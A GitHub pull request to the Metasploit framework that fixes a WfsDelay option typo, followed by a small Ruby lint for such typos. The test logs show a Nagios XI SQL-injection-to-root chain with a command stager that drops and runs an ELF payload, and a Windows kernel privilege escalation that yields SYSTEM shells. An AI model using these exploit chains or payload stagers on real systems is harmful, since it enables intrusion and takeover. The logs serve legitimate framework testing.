
Replace WsfDelay with WfsDelay - Fixes #11018 #11019

Merged
merged 2 commits into rapid7:master from bcoles:wfsdelay on Nov 26, 2018

bcoles (Contributor) commented Nov 25, 2018

Replace WsfDelay with WfsDelay - Fixes #11018

I haven't tested this fix. Presumably WfsDelay wasn't working due to a typo.

Edit: I've confirmed WfsDelay works as per output below.

bcoles (Contributor) commented Nov 25, 2018

Tested. Works.

msf5 > use exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo 
msf5 exploit(linux/http/nagios_xi_chained_rce_2_electric_boogaloo) > set rhosts 10.1.1.159
rhosts => 10.1.1.159
msf5 exploit(linux/http/nagios_xi_chained_rce_2_electric_boogaloo) > set verbose true
verbose => true
msf5 exploit(linux/http/nagios_xi_chained_rce_2_electric_boogaloo) > run

[*] Started reverse TCP handler on 10.1.1.197:4444 
[*] STEP 0: Get Nagios XI version string.
[+] STEP 0: Found Nagios XI version: 5.4.10
[*] STEP 1: Setting Nagios XI DB user to root.
[*] STEP 1: Received a 302 Response. That's good!
[*] STEP 2: Exploiting SQLi to extract user API keys.
[*] STEP 2: Received a 302 Response. That's good!
[*] Found 1 unique api keys
[*] 40e54f81856f74bc7011022b745d6efd
[*] STEP 3: Using API Keys to add an administrative user...
[*] STEP 3: trying to add admin user with key 40e54f81856f74bc7011022b745d6efd
[+] Added user:gwsaYTHzzUcydHV password:HLyPIjitlIQuh userid:4
[*] STEP 4.1: Authenticate as user gwsaYTHzzUcydHV with password HLyPIjitlIQuh
[*] STEP 4.1: Get NSP and nagiosxi for login..
[*] STEP 4.1: login_nsp 1066615de153062f732e7842d4bd8b4fac1b556f2d291bc862b7f5171be96bda 
[*] STEP 4.1: login_nagiosxi unuilgmd7q0395bfm66jvqalm2
[*] STEP 4.2: Authenticating...
[*] STEP 4.2: authed_nagiosxi 3j5ag00cmk4knn2vam6oq2u2k0
[*] Generated command stager: ["printf '\\177\\105\\114\\106\\1\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\2\\0\\3\\0\\1\\0\\0\\0\\124\\200\\4\\10\\64\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\64\\0\\40\\0\\1\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0\\0\\0\\0\\0\\0\\200\\4\\10\\0\\200\\4\\10\\317\\0\\0\\0\\112\\1\\0\\0\\7\\0\\0\\0\\0\\20\\0\\0\\152\\12\\136\\61\\333\\367\\343\\123\\103\\123\\152\\2\\260\\146\\211\\341\\315\\200\\227\\133\\150\\12\\1\\1\\305\\150\\2\\0\\21\\134\\211\\341\\152\\146\\130\\120\\121\\127\\211\\341\\103\\315\\200\\205\\300\\171\\31\\116\\164\\75\\150\\242\\0\\0\\0\\130\\152\\0\\152\\5\\211\\343\\61\\311\\315\\200\\205\\300\\171\\275\\353\\47\\262\\7\\271\\0\\20\\0\\0\\211\\343\\301\\353\\14\\301\\343\\14\\260\\175\\315\\200\\205\\300\\170\\20\\133\\211\\341\\231\\266\\14\\260\\3\\315\\200\\205\\300\\170\\2\\377\\341\\270\\1\\0\\0\\0\\273\\1\\0\\0\\0\\315\\200'>>/tmp/Fptzg ; chmod +x /tmp/Fptzg ; /tmp/Fptzg ; rm -f /tmp/Fptzg"]
[*] STEP 5.1: executing payload
[*] STEP 5.2: removing scripts from disc
[*] Command Stager progress - 100.00% done (701/701 bytes)
[*] STEP 6.1: Setting Nagios XI DB user to nagiosql.
[*] STEP 6.1: Received a 302 Response. That's good!
[*] STEP 6.2: deleting admin
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (861480 bytes) to 10.1.1.159
[*] Meterpreter session 1 opened (10.1.1.197:4444 -> 10.1.1.159:43598) at 2018-11-24 23:22:42 -0500
[*] Transmitting intermediate stager...(106 bytes)

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 6.9 (Linux 2.6.32-696.10.2.el6.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
bcoles (Contributor) commented Nov 25, 2018

Tested. Works.

msf5 exploit(windows/local/ppr_flatten_rec) > run

[*] win32k.sys file version: 5.2.3790.3959
[*] Launching notepad to host the exploit...
[+] Process 1316 launched.
[*] Reflectively injecting the exploit DLL into 1316...
[*] Injecting exploit into 1316 ...
[*] Exploit injected. Injecting payload into 1316...
[*] Payload injected. Executing exploit...
[*] Exploit thread executing (can take a while to run), waiting 30 sec ...
[*] Started bind TCP handler against 172.16.191.171:4444
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[*] Sending stage (179779 bytes) to 172.16.191.171
[*] Meterpreter session 4 opened (172.16.191.196:50123 -> 172.16.191.171:4444) at 2018-11-24 23:58:16 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : USER-40A657CC3B
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 

@busterb busterb self-assigned this Nov 26, 2018

busterb (Contributor) commented Nov 26, 2018

Thanks @bcoles !

@busterb busterb merged commit 5c06cdc into rapid7:master Nov 26, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed

busterb added a commit that referenced this pull request Nov 26, 2018

busterb (Contributor) commented Nov 26, 2018

Release Notes

This fixes the nagios_xi_chained_rce_2_electric_boogaloo and ppr_flatten_rec modules to properly respect the WfsDelay option.
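An added example, not code from this PR or from the metasploit-framework project: a small lint that would have caught this class of typo by listing the `datastore[...]` keys a module reads that it neither registers itself nor gets from the framework. The framework-provided option names and the sample module fragment are constructed assumptions for illustration.

```ruby
# Option names the exploit mixins supply without the module registering them.
# Assumed, partial list for illustration; the real framework provides far more.
FRAMEWORK_OPTIONS = %w[RHOSTS RPORT LHOST LPORT WfsDelay VERBOSE].freeze

# Keys the module registers itself via register_options / register_advanced_options,
# e.g. OptString.new('TARGETURI', [...]).
def registered_keys(source)
  source.scan(/Opt\w+(?:\.new)?\(\s*['"]([^'"]+)['"]/).flatten.uniq
end

# Keys the module reads via datastore['...'].
def referenced_keys(source)
  source.scan(/datastore\[\s*['"]([^'"]+)['"]\s*\]/).flatten.uniq
end

# Referenced keys that are neither registered in the module nor framework-provided.
# A mistyped key is never an error at runtime: datastore['WsfDelay'] is simply nil,
# and nil.to_i is 0, so the configured delay silently disappears.
def unregistered_datastore_keys(source)
  known = registered_keys(source) + FRAMEWORK_OPTIONS
  referenced_keys(source).reject { |k| known.include?(k) }
end

# Constructed module fragment reproducing the bug this PR fixed (hypothetical code).
SAMPLE_MODULE = <<~'RUBY'
  register_options([
    OptString.new('TARGETURI', [true, 'Base path', '/nagiosxi/'])
  ])
  def exploit
    uri = datastore['TARGETURI']
    sleep(datastore['WsfDelay'].to_i)   # typo: should be WfsDelay
  end
RUBY

if __FILE__ == $PROGRAM_NAME
  puts "Unregistered datastore keys: #{unregistered_datastore_keys(SAMPLE_MODULE).inspect}"
end
```

Run against the sample fragment it reports only `WsfDelay`; `TARGETURI` is registered by the module and `WfsDelay` would have matched the framework list.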

msjenkins-r7 added a commit that referenced this pull request Nov 26, 2018

@bcoles bcoles deleted the bcoles:wfsdelay branch Nov 26, 2018

@gdavidson-r7 gdavidson-r7 added the rn-fix label Dec 4, 2018
